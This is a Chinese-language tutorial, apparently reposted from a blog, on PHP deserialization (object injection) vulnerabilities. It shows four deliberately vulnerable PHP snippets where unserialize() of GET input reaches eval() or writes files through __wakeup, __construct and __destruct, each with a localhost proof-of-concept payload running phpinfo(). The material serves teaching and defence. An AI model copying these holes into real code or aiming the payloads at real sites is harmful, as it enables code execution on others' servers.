C php反序列化,php反序列化漏洞 - anansec的个人空间 - OSCHINA - 中文开源技术交流社区...
反序列化本身是沒有漏洞的,但是當反序列化和一些魔術方法結合使用時就可能會產生安全風險。常用的魔術方法__wakeup
反序列化漏洞示例(__wekeup)
class A{var $test = "demo";function __wakeup(){eval($this->test);}}$b = new A();$c = serialize($b);$a = $_GET['test'];$a_unser = unserialize($a);#漏洞利用poc http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:10:"phpinfo();";}
解釋:傳入的參數被反序列化,導致魔術方法__wakeup被自動調用,這時參數傳入的值將被作為eval的參數使用,所以這里會因反序列化導致任意代碼執行。
反序列化漏洞(__wakeup和文件操作)
require "test.php";//測試方便class A{var $test = '123';function __wakeup(){$fp = fopen("test.php", "w");fwrite($fp, $this->test);fclose($fp);}}$a = new A();print_r(serialize($a));$class1 = $_GET['test'];$class1_unser = unserialize($class1);利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}
解釋:和上面一一樣,當傳入的參數被反序列化時,魔術方法__wakeup被調用,傳入的參數會作為fwrite的第二個參數直接寫入test.php文件中,從而導致反序列化漏洞
反序列化漏洞示例(__construct)
require 'test.php';class b{function __construct($test){$fp = fopen("test.php", 'w');fwrite($fp, $test);fclose($fp);}}class a{var $test = 123;function __wakeup(){$obj = new b($this->test);}}$class = $_GET['test'];$class_u = unserialize($class);利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}
解釋:unserialize()會自動調用__wakeup(),__wakeup中實力化a,這時會調用構造函數__construct,因為構造函數被調用,所傳入的參數會作為fwrite的參數寫入shell.php文件,從而造成代碼執行
類的普通方法——反序列化問題
class maniac{public $test;function __construct(){$this->test = new x1();}function __destruct(){$this->test->action();}}class x1{function action(){echo "123";}}class x2{public $test2;function action(){eval($this->test2);}}$class2 = new maniac();unserialize($_GET['test']);漏洞利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:6:"maniac":1:{s:4:"test";O:2:"x2":1:{s:5:"test2";s:10:"phpinfo();";}}
解釋:maniac實例化,構造方法(\_\_construct)被調用,x1被示例化;反序列執行,析構方法(\_\_destreuct)被調用;如果$\_GET沒有傳入合法的序列化字符串,就會自動調用x1的action方法,如果$\_GET接收到正確的序列化字符串,那么析構方法就會調用x2的action方法,從而這里就有可能導致任意命令執行
總結
以上是生活随笔為你收集整理的C php反序列化,php反序列化漏洞 - anansec的个人空间 - OSCHINA - 中文开源技术交流社区...的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 怡宝矿泉水包装上为什么写东方雨虹?
- 下一篇: php post 微信沙箱,微信支付平台